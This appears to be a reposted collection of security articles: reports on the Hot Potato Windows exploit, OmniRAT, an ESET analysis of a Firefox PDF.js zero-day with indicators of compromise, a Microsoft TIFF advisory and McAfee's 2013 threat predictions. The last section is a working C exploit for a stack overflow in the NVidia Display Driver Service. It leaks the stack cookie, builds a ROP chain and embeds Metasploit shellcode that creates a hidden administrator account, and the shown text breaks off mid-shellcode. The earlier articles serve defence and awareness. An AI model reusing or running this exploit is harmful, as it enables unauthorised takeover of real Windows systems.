Another Door to Windows | Hot Potato exploit

Microsoft Windows versions 7, 8, 10, Server 2008 and Server 2012 vulnerable to Hot Potato exploit which gives total control of PC/laptop to hackers

Security researchers from Foxglove Security have discovered that almost all recent versions of Microsoft’s Windows operating system are vulnerable to a privilege escalation exploit. By chaining together a series of known Windows security flaws, researchers from Foxglove Security have discovered a way to break into PCs/systems/laptops running on Windows 7/8/8.1/10 and Windows Server 2008/2010.

The Foxglove researchers have named the exploit as Hot Potato. Hot Potato relies on three different types of attacks, some of which were discovered back at the start of the new millennium, in 2000. By chaining these together, hackers can remotely gain complete access to the PCs/laptops running on above versions of Windows.

Surprisingly, some of the exploits were found way back in 2000 but have still not been patched by Microsoft, with the explanation that by patching them, the company would effectively break compatibility between the different versions of their operating system.

Hot Potato

Hot Potato is a sum of three different security issues with Windows operating system. One of the flaw lies in local NBNS (NetBIOS Name Service) spoofing technique that’s 100% effective. Potential hackers can use this flaw to set up fake WPAD (Web Proxy Auto-Discovery Protocol) proxy servers, and an attack against the Windows NTLM (NT LAN Manager) authentication protocol.

Exploiting these exploits in a chained manner allows the hackers to gain access to the PC/laptop by elevating an application’s permissions from the lowest rank to system-level privileges, the Windows analog for a Linux/Android root user’s permissions.

Foxglove researchers created their exploit on top of a proof-of-concept code released by Google’s Project Zero team in 2014 and have presented their findings at the ShmooCon security conference over the past weekend.

They have also posted proof-of-concept videos on YouTube in which the researchers break Windows versions such as 7, 8, 10, Server 2008 and Server 2012.

You can also access the proof of concept on Foxglove’s GitHub page here.

Mitigation

The researchers said that using SMB (Server Message Block) signing may theoretically block the attack. Other method to stop the NTNL relay attack is by enabling “Extended Protection for Authentication” in Windows.

 

 

Credit:  Vijay Prabhu, techworm

OmniRAT – the $25 way to hack into Windows, OS X and Android devices

 

Just last week, police forces across Europe arrested individuals who they believed had been using the notorious DroidJack malware to spy on Android users.

Now attention has been turned on to another piece of software that can spy on communications, secretly record conversations, snoop on browsing histories and take complete control of a remote device. But, unlike DroidJack, OmniRAT doesn’t limit itself to Android users – it can also hijack computers running Windows and Mac OS X too.

And that’s not the only difference between DroidJack and OmniRAT. Both of them may be being sold openly online, but OmniRAT retails for as little as $25 compared to DroidJack’s more hefty $210.

Security researchers at the anti-virus company Avast describe OmniRAT as a “Remote Administration Tool.

And it certainly can be used for entirely legitimate purposes, with the permission and consent of the owners of Android, Mac and Windows computers it tries to control.

But, in the wrong hands, it can also be considered a “Remote Access Trojan” – giving malicious hackers an opportunity to sneakily spy on and steal from unsuspecting users duped into installing the code.

OmniRAT

In his blog post, researcher Nikolaos Chrysaidos describes how he believes hackers have infected Androids with OmniRAT after sending an SMS.

Apparently, a German Android user explained on the Techboard-online forum how he had received an SMS telling him that an MMS had not been delivered directly to him due to the StageFright vulnerability.

In order to access the MMS, the user was told to follow a bit.ly link within three days, and enter a PIN code.

However, as Crysaidos explains, visiting the URL would initiate the attempt to install OmniRAT onto the target’s Android device:

Once you enter your number and code, an APK, mms-einst8923, is downloaded onto the Android device. The mms-einst8923.apk, once installed, loads a message onto the phone saying that the MMS settings have been successfully modified and loads an icon, labeled “MMS Retrieve” onto the phone.

Once the icon is opened by the victim, mms-einst8923.apk extracts OmniRat, which is encoded within the mms-einst8923.apk. In the example described on Techboard-online, a customized version of OmniRat is extracted.

Android app icon

Perhaps the long list of permissions requested by the app would make you think twice, if it weren’t so common for so many popular apps in the Google Play store to make similar requests.

App permissions

The problem of course is that through its cunning social engineering, and the target’s keen attempt to view the MMS that they might have been sent, it may be all too likely that the user grants permission for the app to be installed without thinking of the possible consequences.

And, as the app is capable of sending its own SMS messages, it may be that your infected Android device could then send further messages with malicious intent to your friends, family and colleagues, in the hope of hijacking further devices. After all, users are more likely to be tricked into believing a message is legitimate, and letting their guard down, if they receive a message apparently coming from someone they know and trust.

Sadly victims will probably have no clue that their devices are compromised, and even if they uninstall the MMS Retrieve icon, the customised version of OmniRAT remains installed on their Android smartphone, and will be sending data to a command and control (C&C) server seemingly based in Russia:

Russian domain

So, the question to ask is how should you protect yourself?

Well, clearly you should resist the urge to install apps onto your smartphone from anywhere other than the official app stores. Although malware has unfortunately snuck into the Google Play store in the past, you’re much more likely to encounter malicious code from unauthorised sources.

Furthermore, I would recommend running a security product on your Android device to detect malicious code and that – if possible – you keep your Android smartphone patched with the latest version of the operating system.

Finally, always think long and hard before clicking on links from untrusted sources. It could be that you’re just one click away from a hacker trying to take remote control of your Android phone.

 

 

Credit: 

Firefox Under Fire: Anatomy of latest 0-day attack

On the August 6th, the Mozilla Foundation released a security update for the Firefox web browser that fixes the CVE-2015-4495 vulnerability in Firefox’s embedded PDF viewer, PDF.js. This vulnerability allows attackers to bypass the same-origin policy and execute JavaScript remotely that will be interpreted in the local file context. This, in turn, allows attackers to read and write files on local machine as well as upload them to a remote server. The exploit for this vulnerability is being actively used in the wild, so Firefox users are advised to update to the latest version (39.0.3 at the time of writing) immediately.

In this blog we provide an analysis of two versions of the script and share details about the associated attacks against Windows, Linux and OS X systems.

According to ESET’s LiveGrid® telemetry, the server at the IP address 185.86.77.48, which was hosting the malicious script, has been up since July 27, 2015. Also we can find corroboration on one of the compromised forums:

image1

Operatives from the Department on Combating Cybercrime of the Ministry of Internal Affairs of Ukraine, who responded promptly to our notification, have also confirmed that the malicious exfiltration server, hosted in Ukraine, has been online since July 27, 2015.

According to our monitoring of the threat, the server became inactive on August 8, 2015.

 

The script

The script used is not obfuscated and easy to analyze. Nevertheless, the code shows that the attackers had good knowledge of Firefox internals.

The malicious script creates an IFRAME with an empty PDF blob. When Firefox is about to open the PDF blob with the internal PDF viewer (PDF.js), new code is injected into the IFRAME (Figure 2). When this code executes, a new sandboxContext property is created within wrappedJSObject. A JavaScript function is written to the sandboxContext property. This function will later be invoked by subsequent code. Together, these steps lead to the successful bypass of the same-origin policy.

Code that creates sandboxContext property

The exploit is very reliable and works smoothly. However, it may display a warning which can catch the attention of tech-savvy users.

The warning message showed on compromised site

After successful exploitation of the bug, execution passes to the exfiltration part of code. The script supports both the Linux and Windows platforms. On Windows it searches for configuration files belonging to popular FTP clients (such as FileZilla, SmartFTP and others), SVN client, instant messaging clients (Psi+ and Pidgin), and the Amazon S3 client.

The list of collected files on Windows at the first stage of attack

These configuration files may contain saved login and password details.

On the Linux systems, the script sends following files to the remote server:

  • /etc/passwd
  • /etc/hosts
  • /etc/hostname
  • /etc/issue

It also parses the /etc/passwd file in the order to get the home directories (homedir) of users on the system. The script then searches files by mask in the home directories collected, and it avoids searching in the home directories of standard system users (such as daemon, bin, sys, sync and so forth).

The list of collected files on Linux at stage 1 of attack

It collects and uploads such files as:

  • history (bash, MySQL, PostgreSQL)
  • SSH related configuration files and authorization keys
  • Configuration files for remote access software – Remmina
  • FileZilla configuration files
  • PSI+ configuration
  • text files with possible credentials and shell scripts

As is evident here, the purpose of the first version of the malicious script was to gather data used mostly by webmasters and site administrators. This allowed attackers to move on to compromising more websites.

 

The second version

The day after Mozilla released the patch for Firefox the attackers decided to go “all-in”: they registered two new domains and improved their script.

The two new malicious domains were maxcdnn[.]com (93.115.38.136) and acintcdn[.]net (185.86.77.48). The second IP address is the same one as used in the first version. Attackers selected these names because the domains look as if they belong to a content delivery network (CDN).

The improved script on the Windows platform not only collects configuration files for applications; it also collects text files containing almost all combinations of words of possible value to attackers (such as password, accounts, bitcoins, credit cards, exploits, certificates, and so on):

List of files collected on Windows during the second attack stage

The attackers improved the Linux script by adding new files to collect and also developed code that works on the Mac OS X operating system:

List of files collected on Macs during the second stage of an attack

Some Russian-speaking commentators misattributed this code to the Duqu malware, because some variables in the code have the text “dq” in them.

 

A copycat attack

Since the bug is easy to exploit and a working copy of the script is available to cybercriminals, different attackers have started to use it. We have seen that various groups quickly adopted the exploit and started to serve it, mostly on adult sites from google-user-cache[.]com (108.61.205.41)

This malicious script does all the same things as the original script, but it collects different files:

The list of collected files used in copycat attack

 

Conclusion

The recent Firefox attacks are an example of active in-the-wild exploitation of a serious software vulnerability. The exploit shows that the malware-writers had a deep knowledge of Firefox internals. It is also an interesting one, since in most cases, exploits are used as an infection vector for other data-stealing trojans. In this instance, however, that was not necessary, because the malicious script alone was able to steal sensitive files from victims’ systems.

Additionally, the exploit started to be reused by other malware operators shortly after its discovery. This is common practice in the malware world.

ESET detects the malicious scripts as JS/Exploit.CVE-2015-4495. We also urge Firefox users to update their browser to the patched version (39.0.3). The internal Firefox PDF reader can also be disabled by changing the pdfjs.disabled setting to true.

 

Indicators of Compromise

A partial list of compromised servers:

hxxp://www.akipress.org/

hxxp://www.tazabek.kg/

hxxp://www.super.kg/

hxxp://www.rusmmg.ru/

hxxp://forum.cs-cart.com/

hxxp://www.searchengines.ru/

hxxp://forum.nag.ru/

Servers used in attack:

maxcdnn[.]com (93.115.38.136)

acintcdn[.]net (185.86.77.48)

google-user-cache[.]com (108.61.205.41)

Hashes (MD5):

0A19CC67A471A352D76ACDA6327BC179547A7A25

2B1A220D523E46335823E7274093B5D44F262049

19BA06ADF175E2798F17A57FD38A855C83AAE03B

3EC8733AB8EAAEBD01E5379936F7181BCE4886B3

 
 

Credit:  Anton Cherepanov

CVE-2013-3906::Microsoft warns Windows users of zero-day danger from booby trapped image files

Microsoft is warning about a brand new security hole in Windows that could let criminals get control of your computer through booby-trapped image files.

The flaw, dubbed CVE-2013-3906, is described by Redmond’s security experts as a “remote code execution vulnerability that exists in the way affected components handle specially crafted TIFF images.”

In short: just opening a maliciously-tweaked TIFF image could lead to what’s known as a drive-by download, or drive-by install, where malware is silently installed onto your computer without any warning message or “are you sure” dialog.

Microsoft

 

Zero-day

The CVE-2013-3906 hole is a zero-day – security jargon that means “the crooks got there first,” with the vulnerability coming to Microsoft’s attention as the result of successful in-the-wild attacks, not through responsible disclosure.

In other words, attacks are not merely likely or imminent, but actually already happening, before a patch is available.

So far, the attacks we’re aware of have relied on embedding booby trapped TIFF images inside DOCX files (documents from Office 2007 and later).

Someone sends you a specially constructed document, for example by email; you open it to see if it’s really worth opening; and that’s that – you’re infected.

But Microsoft has also warned that CVE-2013-3906 might be exploitable through a range of different activities, such as:

  • Previewing or opening a specially-crafted email.
  • Opening a specially crafted file such as an attachment or download.
  • Browsing to a poisoned web page.

 

Fix it

Fortunately, even though there isn’t a full and formal patch ready yet, Microsoft has published a Fix it tool that will quickly render your computer immune to this particular attack.

The Fix it works by telling Windows not to process TIFF files, thus neatly sidestepping the issue of booby-trapped images.

You can achieve the same result by hand (or with a scripting tool, or a group policy object) by setting the following entry in the registry:

HKEY_LOCAL_MACHINE\SOFTWARE\
   Microsoft\Gdiplus\DisableTIFFCodec = 1

Of course, if your workflow requires you to be able to open and view TIFF files, you can’t use the DisableTIFFCodec option.

However, if you try the fix and it gets in the way, it can easily be reversed simply by deleting the abovementioned registry entry: no permanent system changes are made when the Fix it is run.

→ The subkey Gdiplus mentioned above does not exist by default, so searching for it probably won’t work. Go to the key HKLM\SOFTWARE\​Microsoft, create the subkey Gdiplus and add into it a DWORD value named DisableTIFFCodec. Set this value to 1.

 

Our advice

We advise the following:

  • Don’t run as administrator all the time. That way, if you do get attacked, you limit the extent of your exposure.
  • Be cautious of unsolicited attachments.
  • Make sure your anti-virus is updating frequently and correctly to maximise your protection.
  • Try out the Fix it unless you are certain in advance that it will get in the way.

As fellow writer Lee Munson pointed out, November’s monthly Patch Tuesday update is due out next week, so it is possible that a permanent patch will not be available until December.

Be on your guard – and apply the Fix it if you can.

Credit: Sophos, Alexey Baltacov

2013 Threats Predictions by McAfee Labs

McAfee Labs collected an immense amount of data on malware, vulnerabilities, and threats to endpoints, networks, email, and the web in 2012. Using our Global Threat Intelligence, we analyzed this data to block these intrusions and reduce the danger to our customers. Next year we anticipate more of the same: Cybercriminals and hacktivists will strengthen and evolve the techniques and tools they use to assault our privacy, bank accounts, mobile devices, businesses, organizations, and homes.
Mobile Threats
  • Malware shopping spree
Once criminals discover a profit-making technique that works, they’re likely to reuse and automate it. For example, Android/Marketpay.A is a Trojan horse program that buys apps from an app store without user permission. We’re likely to see crooks take this malware’s app-buying payload and add it to a mobile worm.
Buying apps developed by malware authors puts money in their pockets. A mobile worm that uses exploits to propagate over numerous vulnerable phones is the perfect platform for malware that buys such apps; attackers will no longer need victims to install a piece of malware. If user interaction isn’t needed, there will be nothing to prevent a mobile worm from going on a shopping spree.
  • Block that update!
One of the advantages that a mobile service provider (as opposed to Microsoft, for example) has in fighting malware is that once the cell company recognizes malware it can automatically push an update to customers to clean their devices. This works on phones that have not been rooted (or unlocked) by their owners. For mobile malware to stick around for a long time, it will have to prevent updates. Putting an app on a store that does nothing more than download external malware which locks the phone from communicating with the cell provider will achieve this.
Malware
  • Kits lead to an explosion in malware for OS X and mobile
Given the popularity of mobile computing, we should perhaps be surprised that cybercriminals have taken so long to extensively exploit this field. In 2012, however, we’ve seen the number of mobile threats go up dramatically. As we look at them in more detail, we see the large amount of Windowsbased malware owes its existence to the easy availability of malware kits in the underground market. In 2013, there is a good chance ransomware kits will take the lead from malware kits. We have already seen Android and OS X as targets of ransomware. Now the first ransomware kits are being marketed in the underground. For the moment the kits attack only Windows systems, but this may change soon.
  • Ransomware continues to expand to mobile devices
Ransomware on Windows PCs has more than tripled during the past year. Attackers have proven that this “business model” works and are scaling up their attacks to increase profits. One way ransomware is different from other types of malware—such as backdoors, keyloggers, and password stealers—is that attackers do not rely on their victims using the infected systems for financial transactions to separate them from their money. Instead these criminals hijack the users ability to access data, communicate, or use the system at all. The victims are faced with either losing their data or paying a ransom in the hope of regaining access.
One limitation for many malware authors seeking profit from mobile devices is that more users transact business on desktop PCs rather than on tablets or phones. But this trend may not last; the convenience of portable browsers will likely lead more people do their business on the go. Attackers have already developed ransomware for mobile devices. What if the ransom demand included threats to distribute recorded calls and pictures taken with the phone?
We anticipate considerably more activity in this area during 2013.
  • Rootkits diversify, using MBR and other bootkit techniques
The evolution of computer security software and other defenses on client endpoints is driving threats into different areas of the operating system stack, especially for covert and persistent attackers. The frequency of threats attacking Microsoft Windows below the kernel are increasing. Some of the critical assets targeted include the BIOS, master boot record (MBR), volume boot record (VBR), GUID Partition Table (GPT), and NTLoader. Although the volume of these threats is unlikely to approach that of simpler attacks on Windows and applications, the impact of these complex attacks can be far more devastating. We expect to see more threats in this area during 2013.
  • Windows 8 the next big target
Criminals go where the money is. And if this means they have to cope with a new, more secure version of Windows, that’s just what they will do. In many cases they attack the user and not the OS. Via phishing and other techniques users are tricked into revealing information or installing a malicious program. So if you upgrade, don’t rely solely on Windows to protect your system: Remain vigilant and watch out for phishing scams.
Windows 8 should provide improved security against malware and exploits compared with earlier versions of Windows, at least for a while. Now that the underground market for attack and malware kits is much more competitive than three years ago, it is likely that Windows 8–specific malware will be available quicker than Windows 7–specific malware appeared. Systems running the new Unified Extensible Firmware Interface are still vulnerable to MBR-based rootkits, just as previous OS versions were, according to one research company. On the day of Windows 8’s release, the firm announced for sale to its customers the availability of a zero-day vulnerability that circumvents all new security enhancements in Windows 8 and Internet Explorer 10.
In spite of any flaws, Windows 8 is a more secure OS, so upgrading is worth considering. Millions still run Windows XP, which only in fall 2012 was finally eclipsed in the number of its users by newer versions of Windows.
Big-Scale Attacks
Destructive payloads in malware have become rare because attackers prefer to take control of their victims’ computers for financial gain or to steal intellectual property. Recently, however, we have seen several attacks—some apparently targeted, others implemented as worms—in which the only goal was to cause as much damage as possible. We expect this malicious behavior to grow in 2013.
Whether this is hacktivism taken to a new level, as some claim, or just malicious intent is impossible to say, but the worrying fact is that companies appear to be rather vulnerable to such attacks. As with distributed denial of service (DDoS) attacks, the technical bar for the hackers to hurdle is rather low. If attackers can install destructive malware on a large number of machines, then the result can be devastating.
Citadel Trojan Zeros In
Citadel is likely to become the Trojan of choice among cybercriminals who want the rich functionality of Zeus along with dedicated support. With the recent release of Citadel Rain, the Trojan can now dynamically retrieve configuration files, enabling a fraudster to send a targeted payload to a single victim or a selection of victims. This allows thieves to compromise accounts on a one-off basis depending on their criteria and wage attacks in a very targeted manner. Detection will become much harder because the footprint is minimal on the endpoint until the attack occurs. Typically Zeus attacks have been relatively widespread. We will likely see that change in 2013 as more cybercriminals adopt Citadel Rain and its future variants and focus on narrowly targeted attacks seeking the greatest possible gain.
Most Citadel infections are concentrated in just a few populations in Europe, but we expect that number to increase in 2013. The following map shows Germany is the prime location, with more than 200 infections to date.
HTML5
HTML5 is the next version of the standard language of Internet browsers. It provides language improvements, capabilities to remove the need for plug-ins, new layout rendering options, and new powerful APIs that support local data storage, device access, 2D/3D rendering, web-socket communication, and many other features. Today 74 percent of users in North America, 72 percent in Asia, and 83 percent in Europe use browsers that support the majority of HTML5 features.2 Websites are quickly adopting HTML5 for its richer user experience. HTML5 continues the move to the browser, and away from the operating systems, as the platform to run applications. HTML5-based applications are increasing in number, with major players taking advantage of freedom from app stores and improved cross-browser and cross-device compatibility.
Browsers have long been one of the primary vectors for security threats, and HTML5 won’t change that. With HTML5 the threats landscape will shift and broaden. We will see a reduction in exploits focused on plug-ins as browsers provide this functionally via their new media capabilities and APIs. However, HTML5 will offer other opportunities for attackers because the additional functionality will create a larger attack surface. Powerful JavaScript APIs that allow device access will expose the browser as websites gain direct access to hardware.
Botnets and Spam
  • Botnets call home
The biggest threat to botmasters is the unrecoverable loss of their botnets. International cooperation in policing spam, malware, child exploitation, and illegal pills has made that loss a reality for many major botnets over the past few years, and will continue to threaten the proliferation of botnets. When the largest botnets get taken down, then the next largest botnets become the new targets. Botmasters have already reacted to this activity by subdividing botnets and increasing the costs associated with activities that are easily detectable (such as DDoS and spam). It is only a matter of time before botmasters implement fail-safes to reestablish command of a botnet that has lost all of the control servers it usually reports to.
In many cases botnets are temporarily hijacked by whitehat security researchers. Due to possible negative side effects, however, these takeovers do not lead to new commands reaching the infected hosts. There is a massive liability issue associated with the unauthorized remote operation of systems, even with the best of intentions. Pushing new commands to an old Windows machine serving a hospital could turn the PC into a brick and lead to incorrect care or even the death of a patient. Botmasters will take advantage of this reluctance by the good guys to meddle by hardwiring their botnets to reestablish control after a takedown.
  • SMS spam from infected phones
Cell phone providers are working to prevent SMS spam. Their primary method of receiving reports from consumers is for the latter to forward messages to SPAM (7726) on their phones and report the messages so that they can be blocked. An infected phone can also send spammy text messages; then the victims face the problem of having their accounts closed by the providers. We expect to see pill advertising or phishing lures delivered by SMS in 2013.
Crimeware
  • Hacking as a Service
For a long time, cybercriminals have attended public forums to discuss and make business deals with other criminals. In these meetings, they not only offer software for sale but also services. Highly professional cybercrooks, however, see these forums as a waste of time (they are full of “newbies”), a loss of confidentiality (each deal needs direct contact with the client, who could be an undercover agent), and a loss of money (as the purchaser attempts to negotiate a lower price). For these reasons, the number of invitation-only criminal forums requiring registration fees and/or guarantors (vouchers) has increased.
This trend will continue, but to improve anonymity without discouraging buyers, online sales sites modeled on legal trade activities will grow in 2013. On these sites, buyers can make their choices at the click of a mouse, use an anonymous online payment method (such as Liberty Reserve), and receive their purchases without any negotiations or direct contact with the seller.
More secure and anonymous, these offers will be easier to find on the Internet. They will also be more diversified. We have already started to see high-level audit services and offers for project development for cybercriminals.
The number of suspicious outfits claiming to sell zero-day attacks or the sale of spying services reserved for the sole use of governments or secret services will grow. It will be difficult to separate the wheat from the chaff, or to ascertain real activities and real customers.
Hacktivism
  • The decline of Anonymous
Sympathizers of Anonymous are suffering. Too many uncoordinated and unclear operations have been detrimental to its reputation. Added to this, the disinformation, false claims, and pure hacking actions will lead to the movement’s being less politically visible than in the past. Because Anonymous’ level of technical sophistication has stagnated and its tactics are better understood by its potential victims, the group’s level of success will decline. However, we could easily imagine some short-lived spectacular actions due to convergence between hacktivists and antiglobalization supporters, or hacktivists and ecoterrorists.
References:
2013 Threats Predictions, McAfee Labs

NVidia Display Driver Service (Nsvr) Exploit – Christmas 2012:::Bypass DEP + ASLR + /GS + CoE

Here is an interesting exploit for a stack buffer overflow in the NVidia Display Driver Service. The service listens on a named pipe (\pipe\nsvr) which has a NULL DACL configured, which should mean that any logged on user or remote user in a domain context (Windows firewall/file sharing permitting) should be able to exploit this vulnerability.

The buffer overflow occurs as a result of a bad memmove operation, with the stack layout effectively looking like this:

[locals]

[received-data]

[response-buf]

[stack cookie]

[return address]

[arg space]

[etc]

The memmove copies data from the received-data buffer into the response-buf buffer, unchecked. It is possible to control the offset from which the copy starts in the received-data buffer by embedding a variable length string – which forms part of the protocol message being crafted – as well as the number of bytes copied into the response buffer.

The amount of data sent back over the named pipe is related to the number of bytes copied rather than the maximum number of bytes that the buffer is able to safely contain, so it is possible to leak stack data by copying from the end of the received-data buffer, through the response-buf buffer (which is zeroed first time round, and second time round contains whatever was in it beforehand), right to the end of the stack frame (including stack cookie and return address). As the entire block of data copied is sent back, the stack cookie and nvvsvc.exe base can be determined using the aforementioned process. The stack is then trashed, but the function servicing pipe messages won’t return until the final message has been received, so it doesn’t matter too much.

It is then possible to exploit the bug by sending two further packets of data: One containing the leaked stack cookie and a ROP chain dynamically generated using offsets from the leaked nvvsvc.exe base (which simply fills the response-buf buffer when this data is echoed back) and a second packet which contains enough data to trigger an overwrite if data is copied from

the start of the received-data buffer into the response-buf (including the data we primed the latter to contain – stack cookie and ROP chain).

Allowing the function to then return leads to execution of our ROP chain, and our strategically placed Metasploit net user /add shellcode! We get continuation of execution for free because the process spins up a thread to handle each new connection, and there are no deadlocks etc.

I’ve included two ROP chains, one which works against the nvvsvc.exe running by default on my Win7/x64 Dell XPS 15/ NVidia GT540M with drivers from the Dell site, and one which works against the latest version of the drivers for the same card, from:

http://www.geforce.co.uk/hardware/desktop-gpus/geforce-gt-540m

http://www.geforce.co.uk/drivers/results/54709

Hope you find this interesting – it’s a fun bug to play with!

Code:

*/

#include <stdio.h>
#include <Windows.h>

enum EProtocolAction
{
	ProtocolAction_Connect = 0,
	ProtocolAction_Receive,
	ProtocolAction_Send,
	ProtocolAction_Disconnect,
	ProtocolAction_ReadCookie,
};

typedef struct {
	EProtocolAction Action;
	PBYTE Buf;
	DWORD Length;
} ProtocolMessage;

const int GENERIC_BUF_LENGTH = 0x10000;

#define WriteByte(val)	{buf[offs] = val; offs += 1;}
#define WriteWord(val)	{*(WORD *)(buf + offs) = val; offs += 2;}
#define WriteDword(val)	{*(DWORD *)(buf + offs) = val; offs += 4;}
#define WriteBytes(val, len) {memcpy(buf + offs, val, len); offs += len;}
#define BufRemaining()	(sizeof(buf) - offs)

DWORD WritePipe(HANDLE hPipe, void *pBuffer, DWORD cbBuffer)
{
	DWORD dwWritten = 0;

	if(WriteFile(hPipe, pBuffer, cbBuffer, &dwWritten, NULL))
		return dwWritten;

	return 0;
}

DWORD ReadPipe(HANDLE hPipe, void *pBuffer, DWORD cbBuffer, BOOL bTimeout = FALSE)
{
	DWORD dwRead = 0, dwAvailable = 0;

	if(bTimeout)
	{
		for(DWORD i=0; i < 30; i++)
		{
			if(!PeekNamedPipe(hPipe, NULL, NULL, NULL, &dwAvailable, NULL))
				goto Cleanup;

			if(dwAvailable)
				break;

			Sleep(100);
		}

		if(!dwAvailable)
			goto Cleanup;
	}

	if(!ReadFile(hPipe, pBuffer, cbBuffer, &dwRead, NULL))
		goto Cleanup;

Cleanup:
	return dwRead;
}

HANDLE EstablishPipeConnection(char *pszPipe)
{
	HANDLE hPipe = CreateFileA(
			pszPipe,
			GENERIC_READ | GENERIC_WRITE,
			0,
			NULL,
			OPEN_EXISTING,
			0,
			NULL
		);

	if(hPipe == INVALID_HANDLE_VALUE)
	{
		return NULL;
	}

	return hPipe;
}

BYTE *BuildMalicious_LeakStack()
{
	static BYTE buf[0x4020] = {0};
	UINT offs = 0;

	WriteWord(0x52);

	for(UINT i=0; i<0x2000; i++)
		WriteWord(0x41);

	WriteWord(0);

	WriteDword(0);
	WriteDword(0x4078);

	WriteDword(0x41414141);
	WriteDword(0x41414141);
	WriteDword(0x41414141);
	WriteDword(0x41414141);
	WriteDword(0x41414141);

	return buf;
}

BYTE *BuildMalicious_FillBuf()
{
	static BYTE buf[0x4020] = {0};
	UINT offs = 0;

	WriteWord(0x52);
	WriteWord(0); // string

	WriteDword(0);
	WriteDword(0x4000);

	while(BufRemaining())
		WriteDword(0x43434343);

	return buf;
}

BYTE *BuildMalicious_OverwriteStack()
{
	static BYTE buf[0x4020] = {0};
	UINT offs = 0;

	WriteWord(0x52);
	WriteWord(0); // string

	WriteDword(0);
	WriteDword(0x4340); // enough to copy shellcode too

	while(BufRemaining())
		WriteDword(0x42424242);

	return buf;
}

int main(int argc, char* argv[])
{
	DWORD dwReturnCode = 1, dwBytesInOut = 0;
	HANDLE hPipe = NULL;
	static BYTE rgReadBuf[GENERIC_BUF_LENGTH] = {0};

	printf(
			"  ** Nvvsvc.exe Nsvr Pipe Exploit (Local/Domain) **\n"
			"                 [@peterwintrsmith]\n"
			" - Win7 x64 DEP + ASLR + GS Bypass - Christmas 2012 -\n"
		);

	if(argc < 2)
	{
		printf("\tUsage: %s <ip>|local\n\n", argv[0]);

		printf(
				" !! If exploiting remotely, create a session with the target using your domain credentials !!\n"
				"\tCommand: net use \\\\target.ip\\ipc$ /u:domain\\user password\n"
			);

		goto Cleanup;
	}

	memset(rgReadBuf, 0, sizeof(rgReadBuf));

	ProtocolMessage rgConvoMsg[] = {
		{ProtocolAction_Connect, NULL, 0},
		{ProtocolAction_Send, BuildMalicious_LeakStack(), 0x4020},
		{ProtocolAction_Receive, {0}, 0x4200},
		{ProtocolAction_ReadCookie, {0}, 0},
		{ProtocolAction_Send, BuildMalicious_FillBuf(), 0x4020},
		{ProtocolAction_Receive, {0}, 0x4000},
		{ProtocolAction_Send, BuildMalicious_OverwriteStack(), 0x4020},
		{ProtocolAction_Receive, {0}, 0x4200},
		{ProtocolAction_Disconnect, NULL, 0},
	};

	DWORD dwNumberOfMessages = sizeof(rgConvoMsg) / sizeof(ProtocolMessage), i = 0;
	BOOL bTryAgain = FALSE;
	char szPipe[256] = {0};

	if(stricmp(argv[1], "local") == 0)
		strcpy(szPipe, "\\\\.\\pipe\\nvsr");
	else
		sprintf(szPipe, "\\\\%s\\pipe\\nvsr", argv[1]);

	while(i < dwNumberOfMessages)
	{
		printf("\n\tAction %u of %u: ", i + 1, dwNumberOfMessages);

		switch(rgConvoMsg[i].Action)
		{
		case ProtocolAction_Connect:
			printf(" - CONNECT\n");

			hPipe = EstablishPipeConnection(szPipe);
			if(!hPipe)
			{
				printf("!! Unable to create named pipe (GetLastError() = %u [0x%x])\n", GetLastError(), GetLastError());
				goto Cleanup;
			}

			break;
		case ProtocolAction_Disconnect:
			printf(" - DISCONNECT\n");

			CloseHandle(hPipe);
			hPipe = NULL;

			break;
		case ProtocolAction_Send:
			printf(" - CLIENT => SERVER\n");

			if(!(dwBytesInOut = WritePipe(hPipe, rgConvoMsg[i].Buf, rgConvoMsg[i].Length)))
			{
				printf("!! Error writing to pipe\n");
				goto Cleanup;
			}

			printf("\t\tWritten %u (0x%x) characters to pipe\n", dwBytesInOut, dwBytesInOut);

			break;
		case ProtocolAction_Receive:
			printf("\t - SERVER => CLIENT\n");

			if(!(dwBytesInOut = ReadPipe(hPipe, rgReadBuf, rgConvoMsg[i].Length, FALSE)))
			{
				printf("!! Error reading from pipe (at least, no data on pipe)\n");
				goto Cleanup;
			}

			printf("\t\tRead %u (0x%x) characters from pipe\n", dwBytesInOut, dwBytesInOut);

			break;
		case ProtocolAction_ReadCookie:

			// x64 Metasploit cmd/exec:
			//     "net user r00t r00t00r! /add & net localgroup administrators /add"
			//     exitfunc=thread
			char pb_NetAdd_Admin[] = ""
				"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
				"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
				"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
				"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
				"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
				"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
				"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
				"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
				"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
				"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
				"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
				"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
				"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
				"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
				"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
				"\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d\xff"
				"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
				"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x6d\x64"
				"\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73\x65\x72\x20\x72\x30"
				"\x30\x74\x20\x72\x30\x30\x74\x30\x30\x72\x21\x20\x2f\x61\x64"
